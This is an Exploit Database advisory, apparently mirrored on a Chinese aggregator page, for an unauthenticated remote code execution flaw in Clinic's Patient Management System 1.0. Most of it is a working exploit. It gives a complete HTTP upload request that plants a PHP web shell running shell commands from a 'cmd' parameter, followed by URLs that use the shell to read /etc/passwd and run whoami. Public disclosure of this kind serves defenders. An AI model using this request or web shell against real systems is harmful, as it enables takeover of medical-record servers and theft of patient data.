Clinic’s Patient Management System 1.0 – Unauthenticated RCE

• Exploit Database
• 40 阅读

• 作者： Oğulcan Hami Gül
  日期： 2024-02-05
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/51779/

• # Exploit Title: Clinic's Patient Management System 1.0 - Unauthenticated RCE
  # Date: 07.10.2023
  # Exploit Author: Oğulcan Hami Gül
  # Vendor Homepage: https://www.sourcecodester.com/php-clinics-patient-management-system-source-code
  # Software Link: https://www.sourcecodester.com/download-code?nid=15453&title=Clinic%27s+Patient+Management+System+in+PHP%2FPDO+Free+Source+Code
  # Version: 1.0
  # Tested on: Windows 10
  
  ## Unauthenticated users can access /pms/users.php address and they can upload malicious php file instead of profile picture image without any authentication.
  
  POST /pms/users.php HTTP/1.1
  
  Host: 192.168.1.36
  
  User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
  
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
  
  Accept-Language: en-US,en;q=0.5
  
  Accept-Encoding: gzip, deflate, br
  
  Content-Type: multipart/form-data; boundary=---------------------------421755697017784551042596452367
  
  Content-Length: 1054
  
  Origin: http://192.168.1.36
  
  Connection: close
  
  Referer: http://192.168.1.36/pms/users.php
  
  Upgrade-Insecure-Requests: 1
  
  
  
  -----------------------------421755697017784551042596452367
  
  Content-Disposition: form-data; name="display_name"
  
  
  
  sefa7
  
  -----------------------------421755697017784551042596452367
  
  Content-Disposition: form-data; name="user_name"
  
  
  
  sefa7
  
  -----------------------------421755697017784551042596452367
  
  Content-Disposition: form-data; name="password"
  
  
  
  sefa7
  
  -----------------------------421755697017784551042596452367
  
  Content-Disposition: form-data; name="profile_picture"; filename="simple-backdoor.php"
  
  Content-Type: application/x-php
  
  
  
  <!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->
  
  <?php
  
  if(isset($_REQUEST['cmd'])){
  echo "<pre>";
  $cmd = ($_REQUEST['cmd']);
  system($cmd);
  echo "</pre>";
  die;
  }
  
  ?>
  
  Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd
  
  <!--http://michaeldaw.org 2006-->
  
  
  -----------------------------421755697017784551042596452367
  
  Content-Disposition: form-data; name="save_user"
  
  
  
  
  
  -----------------------------421755697017784551042596452367--
  
  
  ## After the file upload request sent by attacker, Application adds a random number to the beginning of the file to be uploaded. Malicious file can be seen under the path /pms/users.php without any authentication.
  
  ## With the request http://192.168.1.36/pms/user_images/1696676940simple-backdoor.php?cmd=whoami the attacker can execute arbitrary command on the application server.